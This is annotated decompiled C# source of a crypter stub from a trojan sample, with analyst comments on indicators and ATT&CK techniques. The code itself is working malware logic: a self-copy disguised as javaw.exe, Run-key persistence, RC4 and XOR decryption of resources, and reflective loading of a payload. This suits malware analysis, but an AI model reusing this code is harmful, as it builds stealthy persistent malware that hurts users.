// Decompiled with JetBrains decompiler
// Type: CrypterSource.Program
// Assembly: AryanF, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 2EB8EB51-C97D-4251-9393-007DD226E453
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan.Win32.Jorik.IRCbot.anj-296f7eecb994ab8b677ff5c7ad9abb7039c800cf5860ac2945e044e236dabf27.exe
//
// Analyst notes (added during review; the code below is unchanged from the decompiler output):
// - This is a "crypter" stub. It carries two encrypted resources, decrypts them in memory,
//   and hands one to a loader type contained in the other. The real payload is not visible here.
// - Host indicators that can be read directly from the code:
//     file:     %APPDATA%\javaw.exe (a copy of the running executable)
//     registry: HKCU\Software\Microsoft\Windows\CurrentVersion\Run, value "Microsoft Essentials"
//     strings:  "svchost.exe", resource set "files", resource names "_CLRb98hOPqbyekD5To7d" and "lolumad"
// - The AV label and the 64-hex-digit string in the path above come from the sample's file name;
//   the hex string is presumably the sample's SHA-256 (confirm against the corpus index).

using Microsoft.Win32;
using System;
using System.IO;
using System.Reflection;
using System.Resources;
using System.Text;

namespace CrypterSource
{
  /// <summary>
  /// Entry-point class of the stub: installs persistence, decrypts the embedded resources and
  /// invokes the in-memory loader. All members are static.
  /// </summary>
  internal class Program
  {
    /// <summary>
    /// Runs the whole chain inside a single try block with an empty catch, so a failure at any
    /// step silently ends the process without error output.
    /// </summary>
    private static void Main()
    {
      try
      {
        // Self-copy to the roaming AppData folder under the name of the Java launcher binary
        // (ATT&CK T1036.005, masquerading). A javaw.exe located directly in %APPDATA% is a
        // useful hunting signal. The two-argument File.Copy overload does not overwrite: if the
        // destination already exists it throws, and the empty catch below then ends Main before
        // any later step runs.
        File.Copy(Assembly.GetExecutingAssembly().Location, Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\javaw.exe");
        // The Base64 literal decodes to "Software\Microsoft\Windows\CurrentVersion\Run"; it is
        // encoded only to keep the key path out of plain string scans. The subkey is opened
        // writable under HKCU (no elevation needed) and the value "Microsoft Essentials" is
        // pointed at the copied file: per-user logon persistence (ATT&CK T1547.001).
        Registry.CurrentUser.OpenSubKey(Encoding.ASCII.GetString(Convert.FromBase64String("U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVu")), true).SetValue("Microsoft Essentials", (object) (Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\javaw.exe"), RegistryValueKind.String);
        // Both encrypted blobs live in the managed resource set named "files" inside this assembly.
        ResourceManager resourceManager = new ResourceManager("files", Assembly.GetExecutingAssembly());
        // Blob 1: decoded with the custom XOR routine below and a hard-coded key. It is only
        // passed on as an argument here; presumably it is the final payload image (not confirmed
        // by this file).
        byte[] numArray = Program.PolyRevDecrypt((byte[]) resourceManager.GetObject("_CLRb98hOPqbyekD5To7d"), "_uxiONH6s");
        // Blob 2: RC4-decrypted with a hard-coded key and loaded straight from the byte array via
        // Assembly.Load(byte[]), so this code never writes the loader assembly to disk
        // (ATT&CK T1620, reflective code loading). The first type it declares is used.
        Type type = Assembly.Load(Program.RC4((byte[]) resourceManager.GetObject("lolumad"), "_FmEb1ONweckrT3iv")).GetTypes()[0];
        // Late-bound call of Run(byte[], string) on a fresh instance of that type. What Run does
        // is defined in the decrypted assembly, not here; the (payload bytes, "svchost.exe")
        // argument pair suggests the payload is executed under a process of that name. Verify by
        // decrypting resource "lolumad" with the key above and reviewing its Run method.
        type.GetMethod("Run").Invoke(Activator.CreateInstance(type), new object[2]
        {
          (object) numArray,
          (object) "svchost.exe"
        });
      }
      catch
      {
        // Swallows every exception; nothing is logged or shown.
      }
    }

    /// <summary>
    /// Standard RC4 (key schedule followed by keystream XOR). Because RC4 is symmetric, the same
    /// routine serves for encryption and decryption.
    /// </summary>
    /// <param name="bytes">Buffer to transform. It is modified in place.</param>
    /// <param name="Key">Key text, converted to bytes with ASCII encoding. An empty key would
    /// make the modulo below divide by zero.</param>
    /// <returns>The same array instance that was passed in, after transformation.</returns>
    public static byte[] RC4(byte[] bytes, string Key)
    {
      byte[] bytes1 = Encoding.ASCII.GetBytes(Key);
      byte[] numArray1 = new byte[256]; // permutation state S
      byte[] numArray2 = new byte[256]; // key repeated to fill 256 bytes
      for (int index = 0; index < 256; ++index)
      {
        numArray1[index] = (byte) index;
        numArray2[index] = bytes1[index % bytes1.GetLength(0)];
      }
      // Key-scheduling pass: shuffle S under control of the expanded key.
      int index1 = 0;
      for (int index2 = 0; index2 < 256; ++index2)
      {
        index1 = (index1 + (int) numArray1[index2] + (int) numArray2[index2]) % 256;
        byte num = numArray1[index2];
        numArray1[index2] = numArray1[index1];
        numArray1[index1] = num;
      }
      // Keystream generation: one keystream byte per input byte, XORed into the input buffer.
      int index3;
      int index4 = index3 = 0;
      for (int index5 = 0; index5 < bytes.GetLength(0); ++index5)
      {
        index4 = (index4 + 1) % 256;
        index3 = (index3 + (int) numArray1[index4]) % 256;
        byte num = numArray1[index4];
        numArray1[index4] = numArray1[index3];
        numArray1[index3] = num;
        int index6 = ((int) numArray1[index4] + (int) numArray1[index3]) % 256;
        bytes[index5] ^= numArray1[index6];
      }
      return bytes;
    }

    /// <summary>
    /// Custom XOR decoder (not a standard cipher). After reversing the input, the byte that ends
    /// up last (the first byte of the stored blob) acts as a per-blob value that is XORed into
    /// every byte together with a byte of the password.
    /// </summary>
    /// <param name="data">Encoded blob. It is reversed in place, so the caller's array is altered.
    /// An empty array would fail on the index below.</param>
    /// <param name="pass">Password text, converted to bytes with ASCII encoding.</param>
    /// <returns>A new array holding data.Length - 1 decoded bytes.</returns>
    public static byte[] PolyRevDecrypt(byte[] data, string pass)
    {
      Array.Reverse((Array) data);
      byte num = data[data.Length - 1]; // per-blob XOR byte taken from the (reversed) tail
      byte[] bytes = Encoding.ASCII.GetBytes(pass);
      byte[] array = new byte[data.Length + 1]; // one slot more than needed; trimmed below
      int index1 = 0;
      for (int index2 = 0; index2 <= data.Length - 1; ++index2)
      {
        array[index2] = (byte) ((uint) data[index2] ^ (uint) num ^ (uint) bytes[index1]);
        // The key buffer is flipped after every byte, so consecutive bytes read the key
        // alternately in original and reversed order while index1 walks and wraps.
        Array.Reverse((Array) bytes);
        if (index1 == bytes.Length - 1)
          index1 = 0;
        else
          ++index1;
      }
      // Drops two trailing slots: the never-written spare slot and the position that held the
      // per-blob byte itself (it decodes to a bare key byte, not payload data).
      Array.Resize(ref array, array.Length - 2);
      return array;
    }

    // Empty method with a random-looking name; nothing in this file calls it. Likely filler
    // emitted by the crypter builder to vary the binary between builds (assumption).
    private static void OHNADWHOWADHohdwAOHD()
    {
    }
  }
}